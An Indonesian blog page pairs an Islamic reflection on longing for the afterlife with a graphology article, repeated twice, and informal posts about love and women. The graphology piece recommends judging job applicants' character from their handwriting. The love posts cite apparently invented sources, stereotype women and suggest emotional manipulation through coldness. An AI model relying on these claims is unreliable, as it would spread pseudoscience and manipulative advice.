Banyak kisah tentang kerinduan. Rindu anak kepada orang tuanya yang sedang berada di kampung, atau sebaliknya rindu orang tua terhadap anaknya yang sedang dalam perantauan di negeri seberang. Ketika rasa rindu itu datang, pastinya kita akan selalu teringat akan apa yang kita rindukan.
Seorang anak yang rindu terhadap orangtuanya di kampung, ia akan berusaha mengumpulkan bekal untuk biaya pulang dan untuk membawa oleh-oleh yang terbaik untuk orangtuanya. Begitupun orang tua yang merindukan anaknya di perantauan, ia akan mempersiapkan apa saja kesukaan anaknya untuk menyambut kedatangannya ketika kabar berita kedatangan anaknya itu didengarnya.
Kisah rindu diatas adalah kisah rindu anak terhadap orangtuanya dan rindu orangtua terhadap anaknya. Lain halnya dengan kisah rindu antara dua orang kekasih yang sedang jatuh cinta. Dalam segala kondisi mereka selalu ingat terhadap kekasihnya, ketika sedang makan, minum, berjalan, duduk bahkan ketika sedang tidurpun teringat kekasihnya sampai-sampai terbawa mimpi.
Seperti itulah rindu ketika datang menghampiri. Kita akan selalu ingat terhadap apa yang kita rindukan. Rindu kampung halaman, rindu orangtua, rindu anak, rindu kekasih, dan rindu-rindu yang lainnya. Tetapi bagi orang beriman kerinduan yang harus ada adalah kerinduan terhadap kampung akhirat, rindu tempat dimana kita akan hidup selama-lamanya disana kelak.
Rindu akan kampung akhirat berarti kita senantiasa teringat kepada pemiliknya yaitu Allahu Rabbul ’Alamin, pencipta segala apa yang ada di jagat raya kehidupan, jagat raya kehidupan dunia dan akhirat. Rindu itu tercermin dari apa yang dilakukannya ketika di dunia ini untuk senantiasa ingat kepada-Nya.
Banyak kisah hamba beriman yang mencerminkan kerinduan akan kampung akhirat, yang dilakukannya senantiasa ingat kepada Allah SWT. Seperti kisah pengembala pada zaman Khalifah Umar Bin Khattab ra. Pada saat itu Abdullah bin Dinar dan Umar Bin Khattab ra. sedang dalam perjalanan menuju Makkah, di tengah perjalanan mereka beristirahat. Tiba-tiba muncul seorang pengembala menuruni lereng gunung dan melewati mereka berdua. Umar kemudian bertanya kepada pengembala itu: ”Hai Pengembala, juallah seekor kambingmu kepada saya?”. ”Tidak, saya ini seorang budak”, jawab pengembala itu. ”katakan saja kepada tuanmu bahwa dombanya di terkam serigala”, Umar menguji. Dengan tegas pengembala itu berkata: ”Kalau begitu, dimana Allah SWT?”.
Ketika mendengar jawaban pengembala itu Umar bin Khattab ra. menangis. Kemudian Umar pergi bersama pengembala tersebut menemui tuannya, untuk dimerdekakannya. Dan umar pun seraya berkata: ”Kamu telah dimerdekakan di dunia ini oleh ucapanmu dan semoga ucapan itu bisa memerdekakanmu di akhirat kelak”.
Kisah lainnya adalah kisah ibu dan putrinya penjual susu yang juga terjadi pada zaman Khalifah Umar bin khattab ra. Ketika ibunya ingin mencampur susu yang akan dijualnya dengan air, supaya mendapatkan keuntungan yang lebih banyak, putrinya mengingatkan: ”Bagaimana jika Amirul Mukminin Umar bin Khattab ra. mengetahui?”. Sang Ibu tidak menghiraukan nasihat dari anaknya dan bersihkeras melaksanakan keinginannya itu. Dan putrinya pun kembali menasihati: ”Kalaupun Amirul Mukminin tidak melihat kita tetapi Rabb Amirul Mukminin melihat kita”.
Begitulah apa yang dilakukan oleh orang yang ada kerinduan dalam dirinya akan akhirat, mereka senantiasa ingat kepada Allah SWT. Selalu berusaha untuk menjauhi perbuatan-perbuatan dosa baik dalam keramaian ataupun dalam kesendiriannya. Kita mengenal hal itu dengan istilah Muroqobatullah atau merasakan pengawasan Allah SWT, yang Maha Mengetahui dan Maha Melihat dan yang tidak pernah mengantuk dan juga tidur.
”…dan Dia bersama kamu di mama saja kamu berada. dan Allah Maha melihat apa yang kamu kerjakan.” (Qs. Al Hadiid:4)
”Allah, tidak ada Tuhan (yang berhak disembah) melainkan Dia Yang Hidup kekal lagi terus menerus mengurus (makhluk-Nya); tidak mengantuk dan tidak tidur. Kepunyaan-Nya apa yang di langit dan di bumi. Tiada yang dapat memberi syafa’at di sisi Allah tanpa izin-Nya? Allah mengetahui apa-apa yang di hadapan mereka dan di belakang mereka, dan mereka tidak mengetahui apa-apa dari ilmu Allah melainkan apa yang dikehendaki-Nya. Kursi Allah meliputi langit dan bumi. Dan Allah tidak merasa berat memelihara keduanya, dan Allah Maha Tinggi lagi Maha Besar.” (Qs. Al Baqarah:255)
Dengan sifat Muroqobatullah itu kita akan senantiasa ingat kepada-Nya. Dan orang-orang yang rindu akan kampung akhirat, sifat ini akan selalu dipelihara. Tentunya Muroqabatullah ini akan mengangkat derajat seorang hamba menjadi orang-orang yang Taqwa. Karena sebagaimana didefinisikan oleh sebagian ulama Taqwa adalah hendaklah Allah tidak melihat kamu berada dalam larangan-larangan-Nya dan tidak kehilangan kamu dalam perintah-perintah-Nya. Definisi Taqwa lainnya adalah mencegah diri dari adzab Allah dengan berbuat amal sholeh dan takut kepada-Nya dikala sepi atau terang-terangan.
Dan Taqwa adalah jalan untuk meraih kebahagian di kampung akhirat sana, yaitu syurga yang mengalir dididalamnya sungai-sungai. Sungguh begitu damai terasa kampung akhirat yang bernama syurga itu. Semoga kita kelak ada diantara hamba yang berada didalamnya. Amin… Ya Rabbal ’Alamin…
”Perumpamaan syurga yang dijanjikan kepada orang-orang yang taqwa ialah (seperti taman); mengalir sungai-sungai didalamnya; buahnya tak henti-henti sedang naungannya (demikian pula). Itulah tempat kesudahan bagi orang-orang yang bertakwa, sedang tempat kesudahan bagi orang-orang kafir ialah neraka.” (Qs. Ar Ra’d:35)
Wallahu a’lam bishshawab
Artikel ini ditulis oleh Addy Kuswoyo. Link ke sumber artikel adalah http://warnaislam.com/rubrik/renungan/ 2009/8/7/3600/Rindu_Akan_Kampung_Akhirat.htm. Thanks to: warnaIslam.com
Friday, August 6, 2010
Menganalisa Pikiran Mereka
ANALISA KARAKTER SESEORANG LEWAT TULISAN
Tulisan tangan memiliki kaitan erat dengan kondisi jiwa kita. Bagaimana cara membacanya…?
Seorang ahli ilmu jiwa mengatakan bahwa tulisan adalah gambaran jiwa seseorang. Sehingga bagi orang yang ahli bagaimana situasi kepribadian seseorang bisa terbaca lewat tulisan tangannya. Namun tentunya bukan ditebak begitu saja secara sembarangan, karena untuk yang satu ini perlu menguasai ilmunya.
Bila diantara pembaca Misteri ada yang berminat membaca tulisan tangan dan isi makna yang terkandung di baliknya, silahkan ikuti intisari ilmu membaca rahasia dibalik tulisan tangan atau Graphologi, lewat artikel ini!
Namun sebelumnya perlu Anda catat bahwa yang namanya dunia ramal-meramal, tidak mungkin akan didapatkan kebenaran yang mencapai 100 persen. Demikian pula dalam meramal kepribadian seseorang lewat tulisan tangannya.
Walaupun tafsiran dari tulisan tangan itu tidak mencapai akurasi sampai 100 persen, namun toh sangat berguna sekali, terutama bagi mereka yang bergerak dalam bidang yang berurusan dengan personalia. Misalnya saja, ketika dibuka lowongan kerja baru, biasanya banyak berdatangan surat lamaran kerja yang masuk. Dan seorang manajer di sebuah perusahaan, atau siapapun ingin agar mempunyai bawahan atau teman kerja yang berkepribadian baik, oleh karenanya layak juga setiap surat lamaran kerja diprioritaskan dengan ditulis dengan bentuk tulisan tangan, yang ditulis sendiri oleh si pelamar yang bersangkutan. Lewat tulisannya ini, Anda bisa membaca kepribadian calon pekerja atau bawahan Anda.Menurut Grafologi, sedikitnya ada enam hal yang bisa kita gunakan dalam metode membaca kepribadian seseorang melalui tulisan tangannya. Uraian secara garis besarnya adalah sebagai berikut:
1. BESAR KECILNYA TULISAN
Dilihat dari sudut pandang besar kecilnya tulisan terdapat empat kriteria penting yaitu: kecil, sedang, besar, dan sangat besar.
Tulisan yang berukuran kecil menunjukkan sifat pendiam, sering menyendiri tapi punya otak yang cemerlang dan pikirannya selalu ilmiah. Orang dengan tulisan seperti ini nalarnya logis.
Tulisan tangan yang ditulis kecil-kecil tapi jelas mudah untuk dibaca menunjukkan penulisnya pandai, juga punya konsentrasi kuat, walau sayang tipe ini kadang suka sekali menonjolkan keilmuannya. Sedangkan jika tulisan tangan kecil dan susah membacanya berarti sang penulis adalah orang bertipe mandiri dalam hidupnya.
Tulisan tangan sedang, mengandung makna bahwa penulisannya adalah orang yang sangat terpaku kepada tradisi kuno, atau hal-hal yang bersifat formil modern. Tipe ini sangat jitu dalam penggunaan logika untuk dasar referensi keputusan-keputusannya.
Jenis tulisan tangan yang besar menunjukkan besarnya ambisi seseorang namun murah hati dan selalu ingin dihargai oleh orang lain, di samping suka melebihkan omong-omongan yang kurang perlu. Sedangkan untuk jenis tulisan tangan yang sangat besar menunjukkan bahwa penulisnya sangat hati-hati dalam segala hal, gemar membuat perhatian bagi sekelilingnya, banyak over aktingnya dalam mencari perhatian, ingin selalu tampil di depan, karena dia gemar berpetualang kemana-mana, mengikuti panggilan jiwanya.
2. GAYA TULISANDalam spesifikasi Gaya Tulisan ini terbagi ke dalam lima sub. Masing-masing, adalah:
- Gaya sambung biasa
Orang yang punya model tulisan begini biasanya senang memberi respon pada setiap masalah, bisa menerima ide dari orang lain, mudah bergaul dan disenangi teman. Baginya berbakat untuk menjadi seorang pemimpin.
- Gaya sambung berbentuk petak
Mengandung arti penulisnya mudah dipengaruhi, selalu menilai enteng setiap persoalan, hingga tindakannya kadang terkesan sembrono, tanpa pemikiran matang.
- Gaya Sambung Berliku
Tulisan yang banyak luka-likunya, mengandung makna bahwa penulisnya sangat formil, hati-hati dan sering menonjolkan status, namun umumnya sifat mereka pendiam, gemar menyendiri dan biasanya banyak memiliki keahlian atau bakat.
- Gaya Lurus dan Lancip
Tulisan tangan model demikian menunjukkan penulisnya orang agresif, sangat tekun mengerjakan sesuatu, walau kadang enggan berkompromi dengan orang lain. Bila lancipnya pada huruf awal saja maka pertanda dirinya orang yang banyak mengalami konflik psikologis, sehingga kadang bersikap agresif.
- Gaya Campuran
Bentuk tulisan bersambung yang tak karuan menuliskan cepat, dan kadang sukar membacanya hal ini mengandung arti bahwa penulisnya adalah orang yang biasa berpikir cepat, kreatif tapi paling tersinggung kalau dikritik. Bahkan, bila tidak sesuai dengan kehendaknya jangan harap orang bisa mendapatkan bantuannya karena dia paling doyan mengelak dalam memberi pertolongan.
3. KEMIRINGAN TULISAN
Bentuk kemiringan tulisan tangan, apakah itu miring ke kiri atau ke kanan, atau tegak lurus. Mereka yang tulisannya miring ke kiri menunjukkan penulisnya bersikap tertutup (introvet). Segala sesuatu diukur menurut penilainnya sendiri atau menurut ukuran masa lampau. Disamping mempunyai sikap konservatif, orang dengan tipe tulisan ini sangat individualis.
Jenis tulisan miring ke kanan, menandakan orang yang ramah, aktif dan bersikap terbuka (extropet), berani menghadapi tantangan baru. Dalam bekerja kata hatinya merupakan power yang penting, tapi dalam hal yang kurang dikuasai dia lebih banyak untuk menanyakan kepada ahlinya.
Tulisan tangan yang bentuknya tegak, mengandung arti bahwa penulisnya adalah tipe orang yang tak suka banyak diatur. Baginya dia adalah miliknya sendiri, kebebasan menjadi hobinya dalam mengerjakan sesuatu tindakan, namun kontrol diri tidak pernah lepas dalam memilah dan memilih hal yang dianggapnya positif.
4. TEKANAN TULISANBila kita memperhatikan bekas tulisan tangan seseorang akan ditemukan tampak goresan tekanan tulisan seperti tercetak di baliknya. Dengan memperhatikan bekas goresan yang tercetak di balik kertas kita akan dapat mengetahui dan menebak bagaimana kepribadian dan tingkah laku si penulisnya.
Tekanan yang halus berarti pembawaannya tenang, tapi mudah atau tidaknya dibaca itu bukan persoalan. Sedangkan tulisan yang bekas tekanannya tercetak jelas di belakangnya menandakan penulisnya punya sifat kaku dan formal. Karenanya orang ini sulit untuk bisa cepat menyesuaikan diri dalam pergaulan, namun dia menganggap bersikap demikian penting baginya agar dihargai orang lain.
5, BENTUK HURUF AWAL
Diantara orang ada yang gemar memainkan bentuk tulisannya, terutama bentuk awal tulisannya. Beberapa ciri dan kecenderungan karakter si penulis adalah sebagai berikut:
- Bentuk Jangkar
Disebut bentuk jangkar karena memang huruf awal tulisnya dalam bentuk jangkar. Tulisan ini memberi tanda bahwa yang memiliki tulisan cenderung bersikap kurang dewasa dan kurang percaya diri dalam menjalani hidup. Dia banyak bersikap pasif.
- Bentuk Busur
Disebut bentuk busur karena memang bentuk awalnya membentuk busur seperti ditarik. Pemilik tulisan ini biasanya cepat puas dengan hasil yuang dicapai, dan hidupnya sangat berpandangan kuat akan nilai-nilai religius.
- Bentuk Memanjang
Huruf awal memanjang yang dituliskan pelan-pelan, menunjukkan bahwa orangnya terlalu berhati-hati dalam merencanakan masa depan. Panjanganya huruf awal menunjukkan kelambatan kerja dan pemborosan waktu.
- Bentuk memanjang dari bawah
Bentuk memanjang dari bawah bila digoreskan secara kilat menunjukkan penulisannya orang yang agresif dan cepat menyelesaikan pekerjaan, disamping gemar melakukan berbagai eksprimen.
6. BENTUK HURUF AKHIR
Bentuk akhir kata yang dituliskan, menunjukkan sikap sosial dan kualitas penulisnya. Tentang huruf akhir ini ada tiga model. Masing-masing, adalah:
- Bila huruf akhir suatu kata ditulis memanjang, mengandung pengertian bahwa orang itu memiliki kemurahan hati, rasa sosialnya besar.
- Bila huruf akhir memanjang ke atas, berarti penulisnya menyukai kemewahan, disamping idealis dan punya semangat yang tinggi.
- Bila huruf akhir menyilang berarti tidak segan mengritik diri sendiri apabila perbuatannya memang salah atau keliru.
Tulisan tangan memiliki kaitan erat dengan kondisi jiwa kita. Bagaimana cara membacanya…?
Seorang ahli ilmu jiwa mengatakan bahwa tulisan adalah gambaran jiwa seseorang. Sehingga bagi orang yang ahli bagaimana situasi kepribadian seseorang bisa terbaca lewat tulisan tangannya. Namun tentunya bukan ditebak begitu saja secara sembarangan, karena untuk yang satu ini perlu menguasai ilmunya.
Bila diantara pembaca Misteri ada yang berminat membaca tulisan tangan dan isi makna yang terkandung di baliknya, silahkan ikuti intisari ilmu membaca rahasia dibalik tulisan tangan atau Graphologi, lewat artikel ini!
Namun sebelumnya perlu Anda catat bahwa yang namanya dunia ramal-meramal, tidak mungkin akan didapatkan kebenaran yang mencapai 100 persen. Demikian pula dalam meramal kepribadian seseorang lewat tulisan tangannya.
Walaupun tafsiran dari tulisan tangan itu tidak mencapai akurasi sampai 100 persen, namun toh sangat berguna sekali, terutama bagi mereka yang bergerak dalam bidang yang berurusan dengan personalia. Misalnya saja, ketika dibuka lowongan kerja baru, biasanya banyak berdatangan surat lamaran kerja yang masuk. Dan seorang manajer di sebuah perusahaan, atau siapapun ingin agar mempunyai bawahan atau teman kerja yang berkepribadian baik, oleh karenanya layak juga setiap surat lamaran kerja diprioritaskan dengan ditulis dengan bentuk tulisan tangan, yang ditulis sendiri oleh si pelamar yang bersangkutan. Lewat tulisannya ini, Anda bisa membaca kepribadian calon pekerja atau bawahan Anda.Menurut Grafologi, sedikitnya ada enam hal yang bisa kita gunakan dalam metode membaca kepribadian seseorang melalui tulisan tangannya. Uraian secara garis besarnya adalah sebagai berikut:
1. BESAR KECILNYA TULISAN
Dilihat dari sudut pandang besar kecilnya tulisan terdapat empat kriteria penting yaitu: kecil, sedang, besar, dan sangat besar.
Tulisan yang berukuran kecil menunjukkan sifat pendiam, sering menyendiri tapi punya otak yang cemerlang dan pikirannya selalu ilmiah. Orang dengan tulisan seperti ini nalarnya logis.
Tulisan tangan yang ditulis kecil-kecil tapi jelas mudah untuk dibaca menunjukkan penulisnya pandai, juga punya konsentrasi kuat, walau sayang tipe ini kadang suka sekali menonjolkan keilmuannya. Sedangkan jika tulisan tangan kecil dan susah membacanya berarti sang penulis adalah orang bertipe mandiri dalam hidupnya.
Tulisan tangan sedang, mengandung makna bahwa penulisannya adalah orang yang sangat terpaku kepada tradisi kuno, atau hal-hal yang bersifat formil modern. Tipe ini sangat jitu dalam penggunaan logika untuk dasar referensi keputusan-keputusannya.
Jenis tulisan tangan yang besar menunjukkan besarnya ambisi seseorang namun murah hati dan selalu ingin dihargai oleh orang lain, di samping suka melebihkan omong-omongan yang kurang perlu. Sedangkan untuk jenis tulisan tangan yang sangat besar menunjukkan bahwa penulisnya sangat hati-hati dalam segala hal, gemar membuat perhatian bagi sekelilingnya, banyak over aktingnya dalam mencari perhatian, ingin selalu tampil di depan, karena dia gemar berpetualang kemana-mana, mengikuti panggilan jiwanya.
2. GAYA TULISANDalam spesifikasi Gaya Tulisan ini terbagi ke dalam lima sub. Masing-masing, adalah:
- Gaya sambung biasa
Orang yang punya model tulisan begini biasanya senang memberi respon pada setiap masalah, bisa menerima ide dari orang lain, mudah bergaul dan disenangi teman. Baginya berbakat untuk menjadi seorang pemimpin.
- Gaya sambung berbentuk petak
Mengandung arti penulisnya mudah dipengaruhi, selalu menilai enteng setiap persoalan, hingga tindakannya kadang terkesan sembrono, tanpa pemikiran matang.
- Gaya Sambung Berliku
Tulisan yang banyak luka-likunya, mengandung makna bahwa penulisnya sangat formil, hati-hati dan sering menonjolkan status, namun umumnya sifat mereka pendiam, gemar menyendiri dan biasanya banyak memiliki keahlian atau bakat.
- Gaya Lurus dan Lancip
Tulisan tangan model demikian menunjukkan penulisnya orang agresif, sangat tekun mengerjakan sesuatu, walau kadang enggan berkompromi dengan orang lain. Bila lancipnya pada huruf awal saja maka pertanda dirinya orang yang banyak mengalami konflik psikologis, sehingga kadang bersikap agresif.
- Gaya Campuran
Bentuk tulisan bersambung yang tak karuan menuliskan cepat, dan kadang sukar membacanya hal ini mengandung arti bahwa penulisnya adalah orang yang biasa berpikir cepat, kreatif tapi paling tersinggung kalau dikritik. Bahkan, bila tidak sesuai dengan kehendaknya jangan harap orang bisa mendapatkan bantuannya karena dia paling doyan mengelak dalam memberi pertolongan.
3. KEMIRINGAN TULISAN
Bentuk kemiringan tulisan tangan, apakah itu miring ke kiri atau ke kanan, atau tegak lurus. Mereka yang tulisannya miring ke kiri menunjukkan penulisnya bersikap tertutup (introvet). Segala sesuatu diukur menurut penilainnya sendiri atau menurut ukuran masa lampau. Disamping mempunyai sikap konservatif, orang dengan tipe tulisan ini sangat individualis.
Jenis tulisan miring ke kanan, menandakan orang yang ramah, aktif dan bersikap terbuka (extropet), berani menghadapi tantangan baru. Dalam bekerja kata hatinya merupakan power yang penting, tapi dalam hal yang kurang dikuasai dia lebih banyak untuk menanyakan kepada ahlinya.
Tulisan tangan yang bentuknya tegak, mengandung arti bahwa penulisnya adalah tipe orang yang tak suka banyak diatur. Baginya dia adalah miliknya sendiri, kebebasan menjadi hobinya dalam mengerjakan sesuatu tindakan, namun kontrol diri tidak pernah lepas dalam memilah dan memilih hal yang dianggapnya positif.
4. TEKANAN TULISANBila kita memperhatikan bekas tulisan tangan seseorang akan ditemukan tampak goresan tekanan tulisan seperti tercetak di baliknya. Dengan memperhatikan bekas goresan yang tercetak di balik kertas kita akan dapat mengetahui dan menebak bagaimana kepribadian dan tingkah laku si penulisnya.
Tekanan yang halus berarti pembawaannya tenang, tapi mudah atau tidaknya dibaca itu bukan persoalan. Sedangkan tulisan yang bekas tekanannya tercetak jelas di belakangnya menandakan penulisnya punya sifat kaku dan formal. Karenanya orang ini sulit untuk bisa cepat menyesuaikan diri dalam pergaulan, namun dia menganggap bersikap demikian penting baginya agar dihargai orang lain.
5, BENTUK HURUF AWAL
Diantara orang ada yang gemar memainkan bentuk tulisannya, terutama bentuk awal tulisannya. Beberapa ciri dan kecenderungan karakter si penulis adalah sebagai berikut:
- Bentuk Jangkar
Disebut bentuk jangkar karena memang huruf awal tulisnya dalam bentuk jangkar. Tulisan ini memberi tanda bahwa yang memiliki tulisan cenderung bersikap kurang dewasa dan kurang percaya diri dalam menjalani hidup. Dia banyak bersikap pasif.
- Bentuk Busur
Disebut bentuk busur karena memang bentuk awalnya membentuk busur seperti ditarik. Pemilik tulisan ini biasanya cepat puas dengan hasil yuang dicapai, dan hidupnya sangat berpandangan kuat akan nilai-nilai religius.
- Bentuk Memanjang
Huruf awal memanjang yang dituliskan pelan-pelan, menunjukkan bahwa orangnya terlalu berhati-hati dalam merencanakan masa depan. Panjanganya huruf awal menunjukkan kelambatan kerja dan pemborosan waktu.
- Bentuk memanjang dari bawah
Bentuk memanjang dari bawah bila digoreskan secara kilat menunjukkan penulisannya orang yang agresif dan cepat menyelesaikan pekerjaan, disamping gemar melakukan berbagai eksprimen.
6. BENTUK HURUF AKHIR
Bentuk akhir kata yang dituliskan, menunjukkan sikap sosial dan kualitas penulisnya. Tentang huruf akhir ini ada tiga model. Masing-masing, adalah:
- Bila huruf akhir suatu kata ditulis memanjang, mengandung pengertian bahwa orang itu memiliki kemurahan hati, rasa sosialnya besar.
- Bila huruf akhir memanjang ke atas, berarti penulisnya menyukai kemewahan, disamping idealis dan punya semangat yang tinggi.
- Bila huruf akhir menyilang berarti tidak segan mengritik diri sendiri apabila perbuatannya memang salah atau keliru.
Tuesday, August 3, 2010
Logika Versus Naluri
Ngomong-ngomong soal kebiasaan manusia, kepingin banget gue membahas cara-cara berbagai manusia menempatkan sikapnya disaat posisi jatuh cinta dikala masa-masa remaja. Antara pria dan wanita sangatlah berbeda dalam menyikapi perasaannya disaat jatuh cinta. Dari penulusuran "mbah urat" didalam mimpinya disampaikan bahwa ketidaksiapan maupun siapnya manusia disaat jatuh cinta itu pasti merasakan ketegangan syaraf yang gak pernah bisa diprediksi tekanannya. sampe2 dokterpun gak ngerti penyebabnya itu apa...
Didalam buku" Reality of the Monkey Loves ", disitu ditulis bahwa manusia adalah seperempat dari nurani dan syaraf ilusi. maksudnya kehidupan manusia itu adalah kehidupan hatinya. Dengan kata lain hati adalah sumber kehidupan manusia.
Sebagian wanita menggunakan naluri sebagai cara mereka menerima kata cinta. Dengan dasar yang kuat kebanyakan seorang pria menunjukan cinta itu berdasarkan logika. Namun dengan jelas sekali seorang wanita tidak menyukai sedikitpun sesuatu yang berbau dengan logika apa lagi dalam urusan cinta . Dalam bukunya " The Over Thinkings " mbah urat mengatakan bahwa seorang wanita adalah sesuatu yang indah, lemah, memiliki hasyrat yang nyata. disitu ditulis bahwa wanita lebih percaya dengan hal yang realistis. tidak ada kata percaya tanpa bukti yang nyata.
Saya dengan bertahap mengalami sendiri pembuktian tersebut, bahwa wanita adalah manusia yang membutuhkan segerombolan bukti untuk memanggil keyakinannya. saya adalah seorang pengamat antara pikiran manusia dan pola sikap yang dilakukan disetiap berbagai proses ketidak pastian hal yang mungkin dan tak mungkin terjadi. Penganalisasian yang saya lakukan terhadap banyak wanita yang memang sebenarnya sengaja saya telah pahami sifat-sifat mereka yang mayoritas seperti itu, memudahkan saya untuk mengerti ciri-ciri datang sebuah keyakinan tanpa bukti yang sebenarnya tidak nyata. Kasarnya adalah "spik" dalam membuat mereka yakin. Didalam pergaulan saya dirumah tidak hanya saya orang yang menjadikan logika sebagai tempat untuk menjadikan hidup itu lebih bermakna. Disaat saya mendapatkan sesuatu yang mungkin tidak mungkinlah saat itu saya merasakan bahwa saya adalah diri saya sendiri. Untuk mempraktikan seberapa level dasar logika yang dimiliki adalah naluri sebagai targetnya. Wanita adalah manusia yang begitu memanfaatkan nalurinya sebagai sarana meyakinkan mereka. tanpa disadari naluri mungkin hal yang tak dapat dilihat, disentuh, maupun dirasa, namun disitulah tempat ternudah seorang pria meyakinkan seorang wanita. Kebanyakan saat ini belum mereka mengerti bagaimana cara kita untuk berkomunikasi dengan "naluri sang wanita".
Yang sangat tidak disyukuri seorang wanita dari apa yang dilakuin pria adalah egonya yang begitu tinggi. Padahal disitulah dengan mudah para pria memanfaatkan naluri wanita. Biasanya pemacu naluri adalah " Senang, sedih, marah, dll ".Kebanyakan pria baik malah dimanfaatkan oleh para wanita yang tanpa disadari pria pun akan membalas apa yang telah diperlakukannya. Biasanya seorang pria membiasankan wanita dengan berbagai tindakan yang memacu naluri wanita bergoyah. Yang sudah populer adalah sikap pria yang dingin terhadapa seorang wanita membuat emosi si wanita itu naik turun.
Emosi adalah jawaban dimana seorang wanita itu dapat jatuh cinta, biasanya seorang wanita yang munafik akan menunjukan cintanya dengan ketidakjujuran mereka yaitu pura-pura . contohnya bersikap acuh terhadap orang yang disayangi. Padahal kalo dalam buku " The Diary Of Jane" wanita yang gitu bakal dapet jodoh yang super-super pelit, soalnya kemunafikan yang dilakukannya dapat menjadikan banyak ketidakpastian untuk dirinya sendiri. Sebagaimana apa yang telah ditakdirkan yang diatas wanita yang seperti itu emang gak akan pernah dapetin rasa puas, makanya nyatanya kebanyakan mereka menyesal disaat sang pria udah gak nunjukin perhatian terhadapnya.
Terjadinya ketidakyakinan wanita adalah semata-mata kurang bukti nyata yang dapt dilihat, diraba, dan dirasa. kalo yang itu belom terpenuhi biasanya wanita gak gampang buat bilang percaya sama apa yang dikatakan seorang pria buat meyakinkan wanita.
Ada tuh lagunya "the diary of jane" mau downloadklik here
Tanda wanita jatuh cinta, Suara!
Mengetaui bagaimana cara cinta wanita bekerja memang sulit? Karena bagaimanpun cinta itu adalah ledakan reaksi secara otomatis dari otak manusia. Tapi ada beberapa hal yang membuat wanita jatuh cinta. Salah satunya adalah suara pria.
Bagaimana ini bisa terjadi, Lihatlah!!
Kebanyakan wanita lebih menyukai suara berat yang dalam dari seorang pria. Karena ini berhubungan dengan testosteron dari seorang pria. Dengan kata lain suara berat menunjukkan kejantanan seorang pria. Ini bukan saat wanita bercinta tapi dalam kehidupan sehari-hari.
Ini bukan masalah apakah pria itu memang benar-benar jantan atau tidak. Karena seperti merk sebuah produk yang terjual karena persepsi bagus dari konsumennya walaupun belum tentu bagus produknya. Sama halnya dengan pria walaupun sebenarnya si pria tidak jantan tapi asal persepsi dari si wanita sebaliknya maka terjadilah sebaliknya. Silahkanlihat artikel tentang mengapa wanita suka cokelat untuk lebih memahami tentang masalah persepsi ini.
Ya cinta wanita itu memang berdasarkan persepsi.
Hal-hal lain dari cinta seorang wanita adalah wanita berbadan gemuk. Bahwsanya wanita gemuk lebih sering menggunakan suara manjanya untuk mengimbangi kesan laki-laki akan tubuhnya. Selain itu juga bertujuan untuk memberikan persepsi perlindungan bagi pria untuk melindunginya dengan suaranya yang manja.
Cinta itu menurut aku hanya untuk wanita. Mengapa? ya karena aku ini adalah lelaki masak jeruk makan jeruk. Mencintai wanita itu adalah omongan tiada habis bagi kaum lelaki. yah! setuju atau nggak setuju itu kenyataannya.
Mengapa wanita itu sangat menggairahkan bagi pria.
1.Karena setiap pria pasti dilahirkan dari wanita
2.Karena wanitalah kebahagian utama dari para pria di dunia ini. Tanpa wanita jangan harap deh anda akan bahagia.
Bagiku mencintai wanita itu mudah tapi cara untuk mendapatkan cinta itu yang susah. Seperti kata pepatah "wanita itu sangat sulit mencintai pada pandangan pertama". Karena tidak seperti kita lelaki yang hanya didasarkan nafsu saat melihat perempuan.
Wanita cenderung tidak peduli dengan penampilan fisik. Yang penting itu kepribadian si pria itu sendiri. Nah, bagi anda jika yang merasa punya tampang dan penampilan pas-pasan masih ada harapan lah.
lalu bagaimana dengan yang hanya punya penampilan di bawah stadart. yah maaf deh anda juga harus mencari wanita dengan tampang dibawah standar juga.
Tapi itu tidak 100% juga loh yang penting anda itu mencintai wanita itu yang terpenting. Beri perhatian terus-menerus untuk cewek idaman anda itu. Yang namaya batu kalau dihujanin air terus juga pasti luluh bukan
Sama dengan wanita. Namun jauh lebih mudah,
Jadi intinya jika ingin menaklukkan hati seorang wanita. beri aja perhatian kepadanya. namun jangan berlebihan sewajar-wajarnya aja tapi sering.
Sekali cinta, wanita akan selalu mencintai
Membicarakan sifat wanita. Ada hal yang sangat menakjubkan...apa itu! Mari kita bicara sebagai lelaki he hehe.
Jika anda punya cewek idaman dan sudah merayu dengan berbagai kata maupun teknik tapi tetap saja gagal mendapatkan cintanya. ITU WAJAR! mengapa demikain. Karena wanita itu memang sulit untuk mencintai seseorang.
Jadi ya! begitu sifat wanita, Sangat susah benget untuk mencintai. Walaupun mungkin anda lelaki yang ganteng, kaya, ataupun pintar. Tetap saja tidak menjamin wanita untuk langsung mencintai anda.
Akan tetapi!
Jika anda sudah mendapatkan cintanya. Maka si wanita akan sangat susah untuk tidak mencinai anda.
Dengan kata lain. Lelaki itu sangat mudah jatuh cinta tapi gampang melupakannya. Namun wanita kebalikannya.
Wanita itu sangat sulit mencintai. Tapi sekali mencintai dia akan sangat sulit untuk melupakannya.
Inilah ciri-ciri dan tanda wanita jatuh cinta. Simaklah! :
2.Mengusapkan tangan pada kakinya yang terpampang.
3.Mengurut kepala atau leher
4.Menyilankan lagi dan membukanya berkali-kali. Jangan berpikiran porno ya!!!
5.Meraba-raba dirinya sendiri
6.Dan masih banyak lagi tanda tanda wanita jatuh cinta serta rahasia wanita lainnya.
Cara Wanita menyimak
Saat seorang wanita menyimak pembicaran entah itu pembicaraan cinta, politik, budaya, ekonomi dsb. Maka wanita yang menjadi pendengar itu menggunakan 6 ekspresi wajah ketika menyimak pembicaraan.
Biasanya dalam sepuluh detik setelah pembicaraan dimulai. Expresi itu akan muncul! Keenam ekspresi itu adalah (naluri wanita) :
2.Terkejut
3.Marah
4.Gembira
5.Takut
6.Gairah
wanita yang menyimak sebuah pembicaraan(pendengar) akan menggunakan 6 ekspresi diatas untuk memantulkan perasaan yang sedang berbicara. Bahkan jika wanita dan wanita berbicara, maka orang yang melihatnya kemungkinan besar mengira kejadian yang sedang dibicarakan terjadi pada dua wanita tersebut.
Wanita juga membaca arti dari apa yang sedang dibicarakan melalui intonasi si pembicara serta bahasa tubuh pembicara.
10 Rahasia Wanita yang perlu diketahui pria
1. Jika wanita tidak menghiraukan, setelah anda menyakiti hatinya, itu artinya dia sudah 100% tidak mencintai anda. Hanya 2 pilihan buat dia kembali jatuh cinta atau biarkan wanita lain mengisi hati anda.
2. Jangan pernah sekalipun memberitahukan kepada pasangan wanita anda, tentang apapun yang dapat membuat mereka merasa tak berguna. Karena itu benar-benar menyakiti naluri wanita mereka dalam waktu lama. Dan sangat sulit disembuhkan.
